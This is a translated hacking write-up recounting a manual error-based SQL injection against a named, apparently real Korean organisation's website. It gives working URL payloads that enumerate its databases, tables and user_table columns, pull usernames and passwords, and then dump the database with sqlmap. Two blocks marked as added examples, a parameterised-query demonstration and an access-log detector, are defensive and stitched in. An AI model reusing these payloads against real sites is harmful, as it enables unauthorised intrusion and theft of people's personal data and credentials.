There are plenty of injection points; I picked one at random:
http://www.awm.or.kr/bbs/view.php?board=report&nid=43593
Check the column count:
http://www.awm.or.kr/bbs/view.php?board=report&nid=43593 order by 74
http://www.awm.or.kr/bbs/view.php?board=report&nid=43593 order by 75
74 returns a normal page and 75 errors, so the column count is 74. Next, try dumping the database...
http://www.awm.or.kr/bbs/view.php?board=document&nid=43615 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74
It errors out, even though the statement is fine... damn... I swapped in several other statements and every one of them errors!!!!!
So below I switch to some stronger statements (I forget where I collected them from). The drawback is that databases, tables, columns and column contents all have to be extracted one at a time!!!! Enough talk, watch:
Dump the databases:
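The ORDER BY and UNION probing above only works because the nid parameter is pasted into the query as text. What follows is an added example, not code from the original post or from the target site: a constructed SQLite table with three columns (the schema and names are assumptions) is queried once by string concatenation and once with an integer check plus a bound parameter. The concatenated version reproduces the ok/error oracle that was used to count columns; the parameterised version rejects the same inputs before they ever reach the database.

```python
import sqlite3

# Constructed stand-in for a bulletin-board post table; this is not the site's real schema.
SCHEMA = """
CREATE TABLE post (nid INTEGER PRIMARY KEY, board TEXT, title TEXT);
INSERT INTO post VALUES (1, 'report', 'first post');
INSERT INTO post VALUES (2, 'report', 'second post');
"""


def _connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def fetch_post_vulnerable(nid):
    """Builds the query by string concatenation: whatever follows the number is parsed as SQL.

    Returns ("ok", rows) or ("error", message) so the caller can see which one the input caused.
    """
    conn = _connect()
    sql = "SELECT nid, board, title FROM post WHERE nid=" + str(nid)
    try:
        return ("ok", conn.execute(sql).fetchall())
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


def fetch_post_hardened(nid):
    """Validates the type, then binds the value; the input never reaches the SQL parser."""
    try:
        nid_int = int(nid)  # "43593 order by 74" fails here, not inside the database
    except (TypeError, ValueError):
        return ("rejected", None)
    conn = _connect()
    rows = conn.execute(
        "SELECT nid, board, title FROM post WHERE nid=?", (nid_int,)
    ).fetchall()
    return ("ok", rows)


if __name__ == "__main__":
    # The SELECT has three columns, so ORDER BY 3 succeeds and ORDER BY 4 errors:
    # that ok/error difference is exactly the oracle used above to arrive at 74.
    for probe in ("1 order by 3", "1 order by 4", "1 and 1=2", "1"):
        print(repr(probe), "->", fetch_post_vulnerable(probe)[0],
              "/", fetch_post_hardened(probe)[0])
```

The type check is deliberate even though the bound parameter alone would already stop the injection: rejecting a non-integer nid up front gives the application a clean place to log the attempt instead of letting it reach the query layer.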
http://www.awm.or.kr/bbs/view.php?board=report&nid=43593 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Keep changing the value after the first "limit" that follows "information_schema.schemata" in the statement, starting from 0, until the page returns normally. As shown in the figure, the offsets give:
0 information_schema
1 PSSP
2 PSSP2013
3 test
At 4 the page returns normally, so the databases are PSSP, PSSP2013 and test.
Dump the current database:
http://www.awm.or.kr/bbs/view.php?board=report&nid=43593 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Prefix the number you get with 0x and decode it, as in the figure below:
The current database is PSSP2013.
Dump the tables:
With the database known, start dumping the tables under it, one at a time...
http://www.awm.or.kr/bbs/view.php?board=report&nid=43593 and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,hex(cast(table_name as char)),0x27,0x7e) from information_schema.tables where table_schema=0x5053535032303133 limit 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
This is a long process... I am completely baffled by how the Korean developers think... 155 tables dumped in the end, and user_table finally turned up as the 155th, the very last one... so manual injection really takes patience.
(Dumping the tables one by one uses the same method as dumping the databases.)
10_group_member_table, 10_group_member_field_table, 15_group_member_field_table, 15_group_member_table,
19_group_member_field_table, 19_group_member_table, 23_group_member_field_table, 23_group_member_table,
27_group_member_field_table, 27_group_member_table, 28_group_member_field_table, 28_group_member_table,
29_group_member_field_table, 29_group_member_table, 2_group_member_field_table, 2_group_member_table,
9_group_member_field_table, 9_group_member_table,
board_Terms, board_Terms2Post, board_trackback, category_info_table, cms_section, cms_section_data,
dir_config_info, gmail_config_info, group_blog_table, group_field_table, group_info_table, group_level_table, group_user_table,
jcalendar_board, jcalendar_comment_memo, jcalendar_config_info, jcalendar_pepaclcal_board,
join_config_info, join_out_config_info, login_config_info, maybbs_align,
maybbs_antigizi_board, maybbs_art_board, maybbs_awmnotice_board, maybbs_board, maybbs_board_board,
maybbs_comment_memo, maybbs_config_info, maybbs_document_board, maybbs_eco_board, maybbs_editor_board,
maybbs_executive_board, maybbs_executive_doc_board, maybbs_g20_board, maybbs_gjboard_board,
maybbs_gjnews_board, maybbs_gjnotice_board, maybbs_gjpaper_board, maybbs_gjstate_board, maybbs_health_board, maybbs_healthnotice_board,
menu_table,
... 153 user_blog_table, 155 user_table (155 tables in total)
Just this pile of junk... and that is only half of them posted here... what were they thinking... fuck!!!!!
Dump the columns:
With the table found, now dump its columns... same method as before:
Table: user_table
http://www.awm.or.kr/bbs/view.php?board=report&nid=43593 and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema=0x5053535032303133 and table_name=0x757365725F7461626C65 limit 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
A few screenshots of the dumped columns:
36 columns in total, all things like job, Email, phone, name, id and address...
Dump the column contents:
Still by hand; no idea how many rows there are...
http://www.awm.or.kr/bbs/view.php?board=report&nid=43593 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,user_table.username,0x27,0x7e,user_table.password,0x27,0x7e,user_table.is_new_passwd,0x27,0x7e) from user_table limit 10,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
First a look at the result:
There really is data; a rough look at how much:
Damn... over a thousand rows... doing that by hand would take forever... gave up on that straight away.
At this point sqlmap takes over, the most practical tool for ***!!!
Result:
Database dumped. That's the end of it.
Summary: by the time I finished I had confused myself... it seems what I was actually after wasn't this data but the admin backend... scanned for the backend and didn't find it either... can any expert take it from here?
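Every stage above (the ORDER BY probing, the UNION attempt, the error-based double-query payloads walking information_schema with an increasing LIMIT offset, the hex-encoded identifiers) leaves a distinctive query string in the web server's access log. The following is an added example, not part of the original write-up: a small Python scanner over constructed Apache combined-format log lines (the IPs, timestamps and sizes are made up; the payload shapes follow the ones quoted above) that decodes each query string, tags the stages it recognises, and summarises per client how many flagged requests were seen and which LIMIT offsets were walked.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache combined-format lines (IPs, timestamps and sizes are made up).
# The 10.0.0.9 client reproduces the sequence from the write-up: ORDER BY probing,
# a UNION attempt, then error-based enumeration with an increasing LIMIT offset.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2014:10:00:00 +0900] "GET /bbs/view.php?board=report&nid=43593 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jan/2014:10:00:01 +0900] "GET /bbs/view.php?board=report&nid=43593%20order%20by%2074 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jan/2014:10:00:02 +0900] "GET /bbs/view.php?board=report&nid=43593%20order%20by%2075 HTTP/1.1" 500 312',
    '10.0.0.9 - - [01/Jan/2014:10:00:03 +0900] "GET /bbs/view.php?board=report&nid=43593+and+1=2+union+select+1,2,3 HTTP/1.1" 500 312',
    '10.0.0.9 - - [01/Jan/2014:10:00:04 +0900] "GET /bbs/view.php?board=report&nid=43593%20and(select%201%20from(select%20count(*),concat((select%20schema_name%20from%20information_schema.schemata%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 312',
    '10.0.0.9 - - [01/Jan/2014:10:00:05 +0900] "GET /bbs/view.php?board=report&nid=43593%20and(select%201%20from(select%20count(*),concat((select%20schema_name%20from%20information_schema.schemata%20limit%201,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 312',
    '10.0.0.9 - - [01/Jan/2014:10:00:06 +0900] "GET /bbs/view.php?board=report&nid=43593%20and(select%201%20from(select%20count(*),concat((select%20table_name%20from%20information_schema.tables%20where%20table_schema=0x5053535032303133%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 312',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures for the stages seen in the write-up, matched against the decoded,
# lower-cased, whitespace-collapsed query string. Order is kept so tags are deterministic.
RULES = [
    ("column-count probe", re.compile(r"\border by \d+\b")),
    ("union-based extraction", re.compile(r"\bunion( all)? select\b")),
    ("schema enumeration", re.compile(r"\binformation_schema\.")),
    ("error-based double query", re.compile(r"floor\(rand\(0?\)\*2\).*\bgroup by\b")),
    ("hex-encoded identifier", re.compile(r"=\s?0x[0-9a-f]{6,}")),
]
LIMIT_RE = re.compile(r"\blimit (\d+),1\b")


def normalize_query(target):
    """URL-decode the query string and collapse whitespace so %20 / + cannot hide keywords."""
    decoded = unquote_plus(urlsplit(target).query).lower()
    return re.sub(r"\s+", " ", decoded)


def classify(line):
    """Parse one log line; return None if it is not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = normalize_query(m["target"])
    tags = [name for name, rx in RULES if rx.search(query)]
    offsets = [int(n) for n in LIMIT_RE.findall(query)]
    return {"ip": m["ip"], "status": int(m["status"]), "tags": tags, "limit_offsets": offsets}


def scan(lines):
    """Return the flagged requests plus a per-client summary (hit count and LIMIT offsets walked)."""
    hits = [c for c in map(classify, lines) if c and c["tags"]]
    per_ip = defaultdict(lambda: {"hits": 0, "limit_offsets": set()})
    for h in hits:
        per_ip[h["ip"]]["hits"] += 1
        per_ip[h["ip"]]["limit_offsets"].update(h["limit_offsets"])
    summary = {ip: {"hits": s["hits"], "limit_offsets": sorted(s["limit_offsets"])}
               for ip, s in per_ip.items()}
    return hits, summary


if __name__ == "__main__":
    hits, summary = scan(LOG_LINES)
    for h in hits:
        print(h["ip"], h["status"], ", ".join(h["tags"]))
    print(summary)
```

The per-client summary is what turns individual signatures into the enumeration pattern: one client, a run of 5xx responses, and LIMIT offsets advancing one step per request. In a WAF or SIEM the same regexes belong on the decoded parameter rather than the raw URL, because %20 and + encoding would otherwise hide every keyword.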